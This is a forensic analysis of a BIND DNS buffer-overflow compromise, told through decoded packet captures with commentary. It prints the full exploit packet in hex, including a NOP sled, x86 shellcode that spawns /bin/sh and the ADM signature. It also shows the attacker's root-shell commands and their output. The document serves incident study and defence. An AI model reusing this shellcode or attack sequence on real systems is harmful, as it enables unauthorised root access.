What you are looking at below are the decoded packets of the exploit. For this particular DNS exploit to work, the victim DNS server must be recursive (as I soon learned). So our black-hat first has to determine that our DNS server is recursive. He tests this by asking it to resolve 107.71.80.216.in-addr.arpa; if the lookup succeeds, he knows our DNS server is recursive. Below you see the packets of the successful, recursive lookup of 107.71.80.216.in-addr.arpa.
04/26-06:42:59.473423 213.28.22.189:1045 -> 172.16.1.107:53
UDP TTL:40 TOS:0x0 ID:18856
Len: 52
95 6A 01 00 00 01 00 00 00 00 00 00 03 31 30 37  .j...........107
02 37 31 02 38 30 03 32 31 36 07 69 6E 2D 61 64  .71.80.216.in-ad
64 72 04 61 72 70 61 00 00 0C 00 01              dr.arpa.....

04/26-06:42:59.474405 172.16.1.107:1028 -> 128.8.10.90:53
UDP TTL:64 TOS:0x0 ID:18861
Len: 52
5C 21 01 00 00 01 00 00 00 00 00 00 03 31 30 37  \!...........107
02 37 31 02 38 30 03 32 31 36 07 69 6E 2D 61 64  .71.80.216.in-ad
64 72 04 61 72 70 61 00 00 0C 00 01              dr.arpa.....

04/26-06:42:59.574808 128.8.10.90:53 -> 172.16.1.107:1028
UDP TTL:48 TOS:0x0 ID:5077
Len: 135
5C 21 81 00 00 01 00 00 00 02 00 00 03 31 30 37  \!...........107
02 37 31 02 38 30 03 32 31 36 07 69 6E 2D 61 64  .71.80.216.in-ad
64 72 04 61 72 70 61 00 00 0C 00 01 02 37 31 02  dr.arpa......71.
38 30 03 32 31 36 07 49 4E 2D 41 44 44 52 04 61  80.216.IN-ADDR.a
72 70 61 00 00 02 00 01 00 07 E9 00 00 12 03 4E  rpa............N
53 30 08 45 4E 54 45 52 41 43 54 03 43 4F 4D 00  S0.ENTERACT.COM.
C0 2C 00 02 00 01 00 07 E9 00 00 13 07 42 49 46  .,...........BIF
52 4F 53 54 08 53 45 41 53 54 52 4F 4D C0 5B     ROST.SEASTROM.[

04/26-06:42:59.576169 172.16.1.107:1028 -> 198.32.64.12:53
UDP TTL:64 TOS:0x0 ID:18862
Len: 46
87 2A 00 00 00 01 00 00 00 00 00 00 07 42 49 46  .*...........BIF
52 4F 53 54 08 53 45 41 53 54 52 4F 4D 03 43 4F  ROST.SEASTROM.CO
4D 00 00 01 00 01                                M.....

04/26-06:42:59.576953 172.16.1.107:1028 -> 198.32.64.12:53
UDP TTL:64 TOS:0x0 ID:18863
Len: 42
DA 57 00 00 00 01 00 00 00 00 00 00 03 4E 53 30  .W...........NS0
08 45 4E 54 45 52 41 43 54 03 43 4F 4D 00 00 01  .ENTERACT.COM...
00 01                                            ..

04/26-06:43:00.215765 198.32.64.12:53 -> 172.16.1.107:1028
UDP TTL:51 TOS:0x0 ID:42900
Len: 462
87 2A 80 00 00 01 00 00 00 0C 00 0C 07 42 49 46  .*...........BIF
52 4F 53 54 08 53 45 41 53 54 52 4F 4D 03 43 4F  ROST.SEASTROM.CO
4D 00 00 01 00 01 03 43 4F 4D 00 00 02 00 01 00  M......COM......
07 E9 00 00 14 01 41 0C 52 4F 4F 54 2D 53 45 52  ......A.ROOT-SER
56 45 52 53 03 4E 45 54 00 C0 26 00 02 00 01 00  VERS.NET..&.....
07 E9 00 00 04 01 47 C0 37 C0 26 00 02 00 01 00  ......G.7.&.....
07 E9 00 00 11 01 46 0C 47 54 4C 44 2D 53 45 52  ......F.GTLD-SER
56 45 52 53 C0 44 C0 26 00 02 00 01 00 07 E9 00  VERS.D.&........
00 04 01 46 C0 37 C0 26 00 02 00 01 00 07 E9 00  ...F.7.&........
00 04 01 49 C0 37 C0 26 00 02 00 01 00 07 E9 00  ...I.7.&........
00 04 01 45 C0 37 C0 26 00 02 00 01 00 07 E9 00  ...E.7.&........
00 04 01 4A C0 67 C0 26 00 02 00 01 00 07 E9 00  ...J.g.&........
00 04 01 4B C0 67 C0 26 00 02 00 01 00 07 E9 00  ...K.g.&........
00 04 01 41 C0 67 C0 26 00 02 00 01 00 07 E9 00  ...A.g.&........
00 04 01 4D C0 67 C0 26 00 02 00 01 00 07 E9 00  ...M.g.&........
00 04 01 48 C0 67 C0 26 00 02 00 01 00 07 E9 00  ...H.g.&........
00 04 01 43 C0 67 C0 35 00 01 00 01 00 36 EE 80  ...C.g.5.....6..
00 04 C6 29 00 04 C0 55 00 01 00 01 00 36 EE 80  ...)...U.....6..
00 04 C0 70 24 04 C0 65 00 01 00 01 00 07 E9 00  ...p$..e........
00 04 C6 11 D0 43 C0 82 00 01 00 01 00 36 EE 80  .....C.......6..
00 04 C0 05 05 F1 C0 92 00 01 00 01 00 36 EE 80  .............6..
00 04 C0 24 94 11 C0 A2 00 01 00 01 00 36 EE 80  ...$.........6..
00 04 C0 CB E6 0A C0 B2 00 01 00 01 00 07 E9 00  ................
00 04 C6 29 00 15 C0 C2 00 01 00 01 00 07 E9 00  ...)............
00 04 C3 08 63 0B C0 D2 00 01 00 01 00 07 E9 00  ....c...........
00 04 C6 29 03 26 C0 E2 00 01 00 01 00 07 E9 00  ...).&..........
00 04 D2 B0 98 12 C0 F2 00 01 00 01 00 07 E9 00  ................
00 04 D8 21 4B 52 C1 02 00 01 00 01 00 07 E9 00  ...!KR..........
00 04 CD BC B9 12                                ......

04/26-06:43:00.218808 172.16.1.107:1028 -> 205.188.185.18:53
UDP TTL:64 TOS:0x0 ID:18864
Len: 46
E6 38 00 00 00 01 00 00 00 00 00 00 07 42 49 46  .8...........BIF
52 4F 53 54 08 53 45 41 53 54 52 4F 4D 03 43 4F  ROST.SEASTROM.CO
4D 00 00 01 00 01                                M.....

04/26-06:43:00.220217 198.32.64.12:53 -> 172.16.1.107:1028
UDP TTL:51 TOS:0x0 ID:42903
Len: 458
DA 57 80 00 00 01 00 00 00 0C 00 0C 03 4E 53 30  .W...........NS0
08 45 4E 54 45 52 41 43 54 03 43 4F 4D 00 00 01  .ENTERACT.COM...
00 01 03 43 4F 4D 00 00 02 00 01 00 07 E9 00 00  ...COM..........
14 01 41 0C 52 4F 4F 54 2D 53 45 52 56 45 52 53  ..A.ROOT-SERVERS
03 4E 45 54 00 C0 22 00 02 00 01 00 07 E9 00 00  .NET..".........
04 01 47 C0 33 C0 22 00 02 00 01 00 07 E9 00 00  ..G.3.".........
11 01 46 0C 47 54 4C 44 2D 53 45 52 56 45 52 53  ..F.GTLD-SERVERS
C0 40 C0 22 00 02 00 01 00 07 E9 00 00 04 01 46  .@."...........F
C0 33 C0 22 00 02 00 01 00 07 E9 00 00 04 01 49  .3."...........I
C0 33 C0 22 00 02 00 01 00 07 E9 00 00 04 01 45  .3."...........E
C0 33 C0 22 00 02 00 01 00 07 E9 00 00 04 01 4A  .3."...........J
C0 63 C0 22 00 02 00 01 00 07 E9 00 00 04 01 4B  .c."...........K
C0 63 C0 22 00 02 00 01 00 07 E9 00 00 04 01 41  .c."...........A
C0 63 C0 22 00 02 00 01 00 07 E9 00 00 04 01 4D  .c."...........M
C0 63 C0 22 00 02 00 01 00 07 E9 00 00 04 01 48  .c."...........H
C0 63 C0 22 00 02 00 01 00 07 E9 00 00 04 01 43  .c."...........C
C0 63 C0 31 00 01 00 01 00 36 EE 80 00 04 C6 29  .c.1.....6.....)
00 04 C0 51 00 01 00 01 00 36 EE 80 00 04 C0 70  ...Q.....6.....p
24 04 C0 61 00 01 00 01 00 07 E9 00 00 04 C6 11  $..a............
D0 43 C0 7E 00 01 00 01 00 36 EE 80 00 04 C0 05  .C.~.....6......
05 F1 C0 8E 00 01 00 01 00 36 EE 80 00 04 C0 24  .........6.....$
94 11 C0 9E 00 01 00 01 00 36 EE 80 00 04 C0 CB  .........6......
E6 0A C0 AE 00 01 00 01 00 07 E9 00 00 04 C6 29  ...............)
00 15 C0 BE 00 01 00 01 00 07 E9 00 00 04 C3 08  ................
63 0B C0 CE 00 01 00 01 00 07 E9 00 00 04 C6 29  c..............)
03 26 C0 DE 00 01 00 01 00 07 E9 00 00 04 D2 B0  .&..............
98 12 C0 EE 00 01 00 01 00 07 E9 00 00 04 D8 21  ...............!
4B 52 C0 FE 00 01 00 01 00 07 E9 00 00 04 CD BC  KR..............
B9 12                                            ..

04/26-06:43:00.222098 172.16.1.107:1028 -> 205.188.185.18:53
UDP TTL:64 TOS:0x0 ID:18865
Len: 42
3D 9D 00 00 00 01 00 00 00 00 00 00 03 4E 53 30  =............NS0
08 45 4E 54 45 52 41 43 54 03 43 4F 4D 00 00 01  .ENTERACT.COM...
00 01                                            ..

04/26-06:43:00.315827 205.188.185.18:53 -> 172.16.1.107:1028
UDP TTL:240 TOS:0x0 ID:40907 DF
Len: 147
E6 38 80 00 00 01 00 01 00 02 00 02 07 42 49 46  .8...........BIF
52 4F 53 54 08 53 45 41 53 54 52 4F 4D 03 43 4F  ROST.SEASTROM.CO
4D 00 00 01 00 01 C0 0C 00 01 00 01 00 02 A3 00  M...............
00 04 C0 94 FC 0A 08 53 45 41 53 54 52 4F 4D 03  .......SEASTROM.
63 6F 6D 00 00 02 00 01 00 02 A3 00 00 02 C0 0C  com.............
C0 36 00 02 00 01 00 02 A3 00 00 0F 03 4E 53 30  .6...........NS0
08 45 4E 54 45 52 41 43 54 C0 3F C0 0C 00 01 00  .ENTERACT.?.....
01 00 02 A3 00 00 04 C0 94 FC 0A C0 5C 00 01 00  ............\...
01 00 02 A3 00 00 04 CF E5 8F 03                 ...........

04/26-06:43:00.317904 205.188.185.18:53 -> 172.16.1.107:1028
UDP TTL:240 TOS:0x0 ID:40908 DF
Len: 147
3D 9D 80 00 00 01 00 01 00 02 00 02 03 4E 53 30  =............NS0
08 45 4E 54 45 52 41 43 54 03 43 4F 4D 00 00 01  .ENTERACT.COM...
00 01 C0 0C 00 01 00 01 00 02 A3 00 00 04 CF E5  ................
8F 03 08 45 4E 54 45 52 41 43 54 03 63 6F 6D 00  ...ENTERACT.com.
00 02 00 01 00 02 A3 00 00 13 07 42 49 46 52 4F  ...........BIFRO
53 54 08 53 45 41 53 54 52 4F 4D C0 3B C0 32 00  ST.SEASTROM.;.2.
02 00 01 00 02 A3 00 00 02 C0 0C C0 4A 00 01 00  ............J...
01 00 02 A3 00 00 04 C0 94 FC 0A C0 0C 00 01 00  ................
01 00 02 A3 00 00 04 CF E5 8F 03                 ...........

04/26-06:43:04.462930 213.28.22.189:1045 -> 172.16.1.107:53
UDP TTL:40 TOS:0x0 ID:18880
Len: 52
95 6A 01 00 00 01 00 00 00 00 00 00 03 31 30 37  .j...........107
02 37 31 02 38 30 03 32 31 36 07 69 6E 2D 61 64  .71.80.216.in-ad
64 72 04 61 72 70 61 00 00 0C 00 01              dr.arpa.....

04/26-06:43:04.463599 172.16.1.107:1028 -> 192.148.252.10:53
UDP TTL:64 TOS:0x0 ID:18866
Len: 52
F1 8E 01 00 00 01 00 00 00 00 00 00 03 31 30 37  .............107
02 37 31 02 38 30 03 32 31 36 07 69 6E 2D 61 64  .71.80.216.in-ad
64 72 04 61 72 70 61 00 00 0C 00 01              dr.arpa.....

04/26-06:43:04.559157 192.148.252.10:53 -> 172.16.1.107:1028
UDP TTL:54 TOS:0x0 ID:7629
Len: 196
F1 8E 85 80 00 01 00 01 00 02 00 02 03 31 30 37  .............107
02 37 31 02 38 30 03 32 31 36 07 69 6E 2D 61 64  .71.80.216.in-ad
64 72 04 61 72 70 61 00 00 0C 00 01 C0 0C 00 0C  dr.arpa.........
00 01 00 01 51 80 00 1D 02 31 31 06 6C 73 70 69  ....Q....11.lspi
74 7A 04 73 6F 68 6F 08 65 6E 74 65 72 61 63 74  tz.soho.enteract
03 63 6F 6D 00 02 37 31 02 38 30 03 32 31 36 07  .com..71.80.216.
49 4E 2D 41 44 44 52 04 41 52 50 41 00 00 02 00  IN-ADDR.ARPA....
01 00 01 51 80 00 06 03 6E 73 30 C0 47 C0 55 00  ...Q....ns0.G.U.
02 00 01 00 01 51 80 00 13 07 62 69 66 72 6F 73  .....Q....bifros
74 08 73 65 61 73 74 72 6F 6D C0 50 C0 77 00 01  t.seastrom.P.w..
00 01 00 00 0E 10 00 04 CF E5 8F 03 C0 89 00 01  ................
00 01 00 00 0E 10 00 04 C0 94 FC 0A              ............

04/26-06:43:04.560130 172.16.1.107:53 -> 213.28.22.189:1045
UDP TTL:64 TOS:0x0 ID:18867
Len: 196
95 6A 85 80 00 01 00 01 00 02 00 02 03 31 30 37  .j...........107
02 37 31 02 38 30 03 32 31 36 07 69 6E 2D 61 64  .71.80.216.in-ad
64 72 04 61 72 70 61 00 00 0C 00 01 C0 0C 00 0C  dr.arpa.........
00 01 00 01 51 80 00 1D 02 31 31 06 6C 73 70 69  ....Q....11.lspi
74 7A 04 73 6F 68 6F 08 65 6E 74 65 72 61 63 74  tz.soho.enteract
03 63 6F 6D 00 02 37 31 02 38 30 03 32 31 36 07  .com..71.80.216.
49 4E 2D 41 44 44 52 04 41 52 50 41 00 00 02 00  IN-ADDR.ARPA....
01 00 01 51 80 00 06 03 6E 73 30 C0 47 C0 55 00  ...Q....ns0.G.U.
02 00 01 00 01 51 80 00 13 07 62 69 66 72 6F 73  .....Q....bifros
74 08 73 65 61 73 74 72 6F 6D C0 50 C0 77 00 01  t.seastrom.P.w..
00 01 00 00 0E 10 00 04 CF E5 8F 03 C0 89 00 01  ................
00 01 00 00 0E 10 00 04 C0 94 FC 0A              ............
---- COMMENT: Tickle Worked ----
The recursive lookup worked. Not only is our system running a vulnerable version of named, but it is recursive. The black-hat now queries our DNS server for the name r.rsavings.net. This is extremely odd: why would a remote system query my DNS server for a different domain name? As we will soon learn, this is how the exploit works. Our DNS server is being suckered. Read below as our DNS server recursively attempts to find the NS for rsavings.net so it can query the IP address (A record) of r.rsavings.net.
04/26-06:43:04.883506 213.28.22.189:1045 -> 172.16.1.107:53
UDP TTL:40 TOS:0x0 ID:18882
Len: 40
95 6B 01 00 00 01 00 00 00 00 00 00 01 72 08 72  .k...........r.r
73 61 76 69 6E 67 73 03 6E 65 74 00 00 01 00 01  savings.net.....

04/26-06:43:04.884189 172.16.1.107:1028 -> 198.41.0.21:53
UDP TTL:64 TOS:0x0 ID:18868
Len: 40
F7 F5 01 00 00 01 00 00 00 00 00 00 01 72 08 72  .............r.r
73 61 76 69 6E 67 73 03 6E 65 74 00 00 01 00 01  savings.net.....

04/26-06:43:04.969435 198.41.0.21:53 -> 172.16.1.107:1028
UDP TTL:244 TOS:0x0 ID:56421 DF
Len: 202
F7 F5 81 00 00 01 00 00 00 04 00 04 01 72 08 72  .............r.r
73 61 76 69 6E 67 73 03 6E 65 74 00 00 01 00 01  savings.net.....
08 52 53 41 56 49 4E 47 53 03 4E 45 54 00 00 02  .RSAVINGS.NET...
00 01 00 02 A3 00 00 12 03 4E 53 33 08 4D 59 44  .........NS3.MYD
4F 4D 41 49 4E 03 43 4F 4D 00 C0 20 00 02 00 01  OMAIN.COM.. ....
00 02 A3 00 00 06 03 4E 53 34 C0 3C C0 20 00 02  .......NS4.<. ..
00 01 00 02 A3 00 00 06 03 57 57 57 C0 20 C0 20  .........WWW. .
00 02 00 01 00 02 A3 00 00 08 05 53 45 52 56 32  ...........SERV2
C0 20 C0 38 00 01 00 01 00 02 A3 00 00 04 D8 22  . .8..........."
59 03 C0 56 00 01 00 01 00 02 A3 00 00 04 D8 22  Y..V..........."
59 04 C0 68 00 01 00 01 00 02 A3 00 00 04 3F E2  Y..h..........?.
51 0D C0 7A 00 01 00 01 00 02 A3 00 00 04 3F E2  Q..z..........?.
51 0C                                            Q.

04/26-06:43:04.970963 172.16.1.107:1028 -> 198.41.3.38:53
UDP TTL:64 TOS:0x0 ID:18869
Len: 42
C2 4E 00 00 00 01 00 00 00 00 00 00 03 4E 53 34  .N...........NS4
08 4D 59 44 4F 4D 41 49 4E 03 43 4F 4D 00 00 01  .MYDOMAIN.COM...
00 01                                            ..

04/26-06:43:04.971751 172.16.1.107:1028 -> 198.41.3.38:53
UDP TTL:64 TOS:0x0 ID:18870
Len: 42
F2 0B 00 00 00 01 00 00 00 00 00 00 03 4E 53 33  .............NS3
08 4D 59 44 4F 4D 41 49 4E 03 43 4F 4D 00 00 01  .MYDOMAIN.COM...
00 01                                            ..

04/26-06:43:04.972052 172.16.1.107:1028 -> 63.226.81.13:53
UDP TTL:64 TOS:0x0 ID:18871
Len: 40
0C BC 01 00 00 01 00 00 00 00 00 00 01 72 08 72  .............r.r
73 61 76 69 6E 67 73 03 6E 65 74 00 00 01 00 01  savings.net.....

04/26-06:43:05.063551 198.41.3.38:53 -> 172.16.1.107:1028
UDP TTL:242 TOS:0x0 ID:42903 DF
Len: 202
C2 4E 80 00 00 01 00 01 00 04 00 04 03 4E 53 34  .N...........NS4
08 4D 59 44 4F 4D 41 49 4E 03 43 4F 4D 00 00 01  .MYDOMAIN.COM...
00 01 C0 0C 00 01 00 01 00 02 A3 00 00 04 D8 22  ..............."
59 04 08 4D 59 44 4F 4D 41 49 4E 03 43 4F 4D 00  Y..MYDOMAIN.COM.
00 02 00 01 00 02 A3 00 00 06 03 4E 53 31 C0 32  ...........NS1.2
C0 32 00 02 00 01 00 02 A3 00 00 06 03 4E 53 32  .2...........NS2
C0 32 C0 32 00 02 00 01 00 02 A3 00 00 06 03 4E  .2.2...........N
53 33 C0 32 C0 32 00 02 00 01 00 02 A3 00 00 02  S3.2.2..........
C0 0C C0 4A 00 01 00 01 00 02 A3 00 00 04 D8 22  ...J..........."
59 01 C0 5C 00 01 00 01 00 02 A3 00 00 04 D8 22  Y..\..........."
59 02 C0 6E 00 01 00 01 00 02 A3 00 00 04 D8 22  Y..n..........."
59 03 C0 0C 00 01 00 01 00 02 A3 00 00 04 D8 22  Y.............."
59 04                                            Y.

04/26-06:43:05.065790 198.41.3.38:53 -> 172.16.1.107:1028
UDP TTL:242 TOS:0x0 ID:42904 DF
Len: 202
F2 0B 80 00 00 01 00 01 00 04 00 04 03 4E 53 33  .............NS3
08 4D 59 44 4F 4D 41 49 4E 03 43 4F 4D 00 00 01  .MYDOMAIN.COM...
00 01 C0 0C 00 01 00 01 00 02 A3 00 00 04 D8 22  ..............."
59 03 08 4D 59 44 4F 4D 41 49 4E 03 43 4F 4D 00  Y..MYDOMAIN.COM.
00 02 00 01 00 02 A3 00 00 06 03 4E 53 31 C0 32  ...........NS1.2
C0 32 00 02 00 01 00 02 A3 00 00 06 03 4E 53 32  .2...........NS2
C0 32 C0 32 00 02 00 01 00 02 A3 00 00 02 C0 0C  .2.2............
C0 32 00 02 00 01 00 02 A3 00 00 06 03 4E 53 34  .2...........NS4
C0 32 C0 4A 00 01 00 01 00 02 A3 00 00 04 D8 22  .2.J..........."
59 01 C0 5C 00 01 00 01 00 02 A3 00 00 04 D8 22  Y..\..........."
59 02 C0 0C 00 01 00 01 00 02 A3 00 00 04 D8 22  Y.............."
59 03 C0 7C 00 01 00 01 00 02 A3 00 00 04 D8 22  Y..|..........."
59 04                                            Y.
--- COMMENT: Buffer Overflow! ---
Our nameserver identifies the nameserver for rsavings.net, 63.226.81.13. Our simple UDP DNS request for r.rsavings.net should have resulted in a simple UDP reply containing an answer. However, we get a TCP connection instead, which is used for the buffer overflow attack. The following packets are the actual buffer overflow attack. Notice the '/bin/sh' shell run at the end of the buffer overflow; that is the whole purpose of the exploit. NOTE: Based on passive fingerprinting, another forensic tool, this system also appears to be a Linux box.
04/26-06:43:05.096725 63.226.81.13:1351 -> 172.16.1.107:53
TCP TTL:49 TOS:0x0 ID:26472 DF
**S***** Seq: 0x45B8E7 Ack: 0x0 Win: 0x7D78
TCP Options => MSS: 1460 SackOK TS: 4037587 0 NOP WS: 0

04/26-06:43:05.097443 172.16.1.107:53 -> 63.226.81.13:1351
TCP TTL:64 TOS:0x0 ID:18872 DF
**S***A* Seq: 0x3FA07873 Ack: 0x45B8E8 Win: 0x7D78
TCP Options => MSS: 1460 SackOK TS: 144023498 4037587 NOP WS: 0

04/26-06:43:05.204503 63.226.81.13:1351 -> 172.16.1.107:53
TCP TTL:50 TOS:0x0 ID:26473 DF
******A* Seq: 0x45B8E8 Ack: 0x3FA07874 Win: 0x7D78
TCP Options => NOP NOP TS: 4037599 144023498

04/26-06:43:05.205940 63.226.81.13:1351 -> 172.16.1.107:53
TCP TTL:50 TOS:0x0 ID:26474 DF
*****PA* Seq: 0x45B8E8 Ack: 0x3FA07874 Win: 0x7D78
TCP Options => NOP NOP TS: 4037599 144023498
19 C8                                            ..

04/26-06:43:05.206168 172.16.1.107:53 -> 63.226.81.13:1351
TCP TTL:64 TOS:0x0 ID:18873 DF
******A* Seq: 0x3FA07874 Ack: 0x45B8EA Win: 0x7D78
TCP Options => NOP NOP TS: 144023509 4037599

04/26-06:43:05.244101 63.226.81.13:1351 -> 172.16.1.107:53
TCP TTL:50 TOS:0x0 ID:26475 DF
*****PA* Seq: 0x45B8EA Ack: 0x3FA07874 Win: 0x7D78
TCP Options => NOP NOP TS: 4037599 144023498
0C BC 84 00 00 01 00 01 00 00 00 01 01 72 08 72  .............r.r
73 61 76 69 6E 67 73 03 6E 65 74 00 00 01 00 01  savings.net.....
01 72 08 72 73 61 76 69 6E 67 73 03 6E 65 74 00  .r.rsavings.net.
00 01 00 01 00 00 01 2C 00 04 01 02 03 04 01 72  .......,.......r
08 72 73 61 76 69 6E 67 73 03 6E 65 74 00 00 1E  .rsavings.net...
00 01 00 00 01 2C 19 6B 00 06 61 64 6D 61 64 6D  .....,.k..admadm
00 00 90 90 90 90 90 90 90 90 90 90 90 90 90 90  ................
90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90  ................
... repeated noops (0x90) removed for brevity sake ---
90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90  ................
90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90  ................
90 90 90 90 90 90 90 90 90 90 90 90 90 90 E9 AC  ................
01 00 00 5E 89 76 0C 8D 46 08 89 46 10 8D 46 2E  ...^.v..F..F..F.
89 46 14 56 EB 54 5E 89 F3 B9 00 00 00 00 BA 00  .F.V.T^.........
00 00 00 B8 05 00 00 00 CD 80 50 8D 5E 02 B9 FF  ..........P.^...
01 00 00 B8 27 00 00 00 CD 80 8D 5E 02 B8 3D 00  ....'......^..=.
00 00 CD 80 5B 53 B8 85 00 00 00 CD 80 5B B8 06  ....[S.......[..
00 00 00 CD 80 8D 5E 0B B8 0C 00 00 00 CD 80 89  ......^.........
F3 B8 3D 00 00 00 CD 80 EB 2C E8 A7 FF FF FF 2E  ..=......,......
00 41 44 4D 52 4F 43 4B 53 00 2E 2E 2F 2E 2E 2F  .ADMROCKS.../../
2E 2E 2F 2E 2E 2F 2E 2E 2F 2E 2E 2F 2E 2E 2F 2E  ../../../../../.
2E 2F 2E 2E 2F 00 5E B8 02 00 00 00 CD 80 89 C0  ./../.^.........
85 C0 0F 85 8E 00 00 00 89 F3 8D 4E 0C 8D 56 18  ...........N..V.
B8 0B 00 00 00 CD 80 B8 01 00 00 00 CD 80 E8 75  ...............u
00 00 00 10 00 00 00 00 00 00 00 74 68 69 73 69  ...........thisi
73 73 6F 6D 65 74 65 6D 70 73 70 61 63 65 66 6F  ssometempspacefo
72 74 68 65 73 6F 63 6B 69 6E 61 64 64 72 69 6E  rthesockinaddrin
79 65 61 68 79 65 61 68 69 6B 6E 6F 77 74 68 69  yeahyeahiknowthi
73 69 73 6C 61 6D 65 62 75 74 61 6E 79 77 61 79  sislamebutanyway
77 68 6F 63 61 72 65 73 68 6F 72 69 7A 6F 6E 67  whocareshorizong
6F 74 69 74 77 6F 72 6B 69 6E 67 73 6F 61 6C 6C  otitworkingsoall
69 73 63 6F 6F 6C EB 86 5E 56 8D 46 08 50 8B 46  iscool..^V.F.P.F
04 50 FF 46 04 89 E1 BB 07 00 00 00 B8 66 00 00  .P.F.........f..
00 CD 80 83 C4 0C 89 C0 85 C0 75 DA 66 83 7E 08  ..........u.f.~.
02 75 D3 8B 56 04 4A 52 89 D3 B9 00 00 00 00 B8  .u..V.JR........
3F 00 00 00 CD 80 5A 52 89 D3 B9 01 00 00 00 B8  ?.....ZR........
3F 00 00 00 CD 80 5A 52 89 D3 B9 02 00 00 00 B8  ?.....ZR........
3F 00 00 00 CD 80 EB 12 5E 46 46 46 46 46 C7 46  ?.......^FFFFF.F
10 00 00 00 00 E9 FE FE FF FF E8 E9 FF FF FF E8  ................
4F FE FF FF 2F 62 69 6E 2F 73 68 00 2D 63 00 FF  O.../bin/sh.-c..
FF FF FF FF FF FF FF FF FF FF FF FF 00 00 00 00  ................
70 6C 61 67 75 65 7A 5B 41 44 4D 5D 31 30 2F 39  plaguez[ADM]10/9
39 2D 65 78 69 74 00 90 90 90 90 90 90 90 90 90  9-exit..........
90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90  ................
90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90  ................
90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90  ................
90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90  ................
90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90  ................
90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90  ................
90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90  ................
90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90  ................
90 90 90 90 90 90 90 90 C3 D6 FF BF C3 D6 FF BF  ................
C3 D6 FF BF C3 D6 FF BF C3 D6 FF BF C3 D6 FF BF  ................
C3 D6 FF BF C3 D6 FF BF C3 D6 FF BF C3 D6 FF BF  ................
C3 D6 FF BF C3 D6 FF BF C3 D6 FF BF C3 D6 FF BF  ................
C3 D6 FF BF C3 D6 FF BF C3 D6 FF BF C3 D6 FF BF  ................
C3 D6 FF BF C3 D6 FF BF 00 00 00 00 00 00 00 00  ................
00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00  ................
00 00 00 00 00 00 00 00                          ........
--- COMMENT: The script ---
Now that the buffer overflow has been launched, we have a root shell. Something must be done with that root shell. Our black-hat runs the following commands with that shell. He first confirms the system architecture (uname -a) and the shell uid (id). He then inserts two accounts onto the system, twin and hantu.
04/26-06:43:05.483639 172.16.1.107:53 -> 63.226.81.13:1351
TCP TTL:64 TOS:0x0 ID:18876 DF
******A* Seq: 0x3FA07874 Ack: 0x45D2B2 Win: 0x7C70
TCP Options => NOP NOP TS: 144023537 4037617

04/26-06:43:06.219868 63.226.81.13:1351 -> 172.16.1.107:53
TCP TTL:50 TOS:0x0 ID:26480 DF
*****PA* Seq: 0x45D2B2 Ack: 0x3FA07874 Win: 0x7D78
TCP Options => NOP NOP TS: 4037700 144023537
63 64 20 2F 3B 20 75 6E 61 6D 65 20 2D 61 3B 20  cd /; uname -a;
70 77 64 3B 20 69 64 3B 0A                       pwd; id;.

04/26-06:43:06.233691 172.16.1.107:53 -> 63.226.81.13:1351
TCP TTL:64 TOS:0x0 ID:18877 DF
******A* Seq: 0x3FA07874 Ack: 0x45D2CB Win: 0x7C70
TCP Options => NOP NOP TS: 144023612 4037700

04/26-06:43:06.236460 172.16.1.107:53 -> 63.226.81.13:1351
TCP TTL:64 TOS:0x0 ID:18878 DF
*****PA* Seq: 0x3FA07874 Ack: 0x45D2CB Win: 0x7C70
TCP Options => NOP NOP TS: 144023612 4037700
4C 69 6E 75 78 20 61 70 6F 6C 6C 6F 2E 75 69 63  Linux apollo.uic
6D 62 61 2E 65 64 75 20 32 2E 32 2E 35 2D 31 35  mba.edu 2.2.5-15
20 23 31 20 4D 6F 6E 20 41 70 72 20 31 39 20 32   #1 Mon Apr 19 2
32 3A 32 31 3A 30 39 20 45 44 54 20 31 39 39 39  2:21:09 EDT 1999
20 69 35 38 36 20 75 6E 6B 6E 6F 77 6E 0A         i586 unknown.

04/26-06:43:06.346489 63.226.81.13:1351 -> 172.16.1.107:53
TCP TTL:50 TOS:0x0 ID:26482 DF
******A* Seq: 0x45D2CB Ack: 0x3FA078C2 Win: 0x7D78
TCP Options => NOP NOP TS: 4037713 144023612

04/26-06:43:06.346819 172.16.1.107:53 -> 63.226.81.13:1351
TCP TTL:64 TOS:0x0 ID:18879 DF
*****PA* Seq: 0x3FA078C2 Ack: 0x45D2CB Win: 0x7C70
TCP Options => NOP NOP TS: 144023623 4037713
2F 0A 75 69 64 3D 30 28 72 6F 6F 74 29 20 67 69  /.uid=0(root) gi
64 3D 30 28 72 6F 6F 74 29 20 67 72 6F 75 70 73  d=0(root) groups
3D 30 28 72 6F 6F 74 29 2C 31 28 62 69 6E 29 2C  =0(root),1(bin),
32 28 64 61 65 6D 6F 6E 29 2C 33 28 73 79 73 29  2(daemon),3(sys)
2C 34 28 61 64 6D 29 2C 36 28 64 69 73 6B 29 2C  ,4(adm),6(disk),
31 30 28 77 68 65 65 6C 29 0A                    10(wheel).

04/26-06:43:06.486257 63.226.81.13:1351 -> 172.16.1.107:53
TCP TTL:50 TOS:0x0 ID:26483 DF
******A* Seq: 0x45D2CB Ack: 0x3FA0791C Win: 0x7D78
TCP Options => NOP NOP TS: 4037727 144023623

04/26-06:43:09.880779 213.28.22.189:1045 -> 172.16.1.107:53
UDP TTL:40 TOS:0x0 ID:18907
Len: 40
95 6B 01 00 00 01 00 00 00 00 00 00 01 72 08 72  .k...........r.r
73 61 76 69 6E 67 73 03 6E 65 74 00 00 01 00 01  savings.net.....

04/26-06:43:19.875096 213.28.22.189:1045 -> 172.16.1.107:53
UDP TTL:40 TOS:0x0 ID:18941
Len: 40
95 6B 01 00 00 01 00 00 00 00 00 00 01 72 08 72  .k...........r.r
73 61 76 69 6E 67 73 03 6E 65 74 00 00 01 00 01  savings.net.....

04/26-06:43:39.856657 213.28.22.189:1045 -> 172.16.1.107:53
UDP TTL:40 TOS:0x0 ID:19019
Len: 40
95 6B 01 00 00 01 00 00 00 00 00 00 01 72 08 72  .k...........r.r
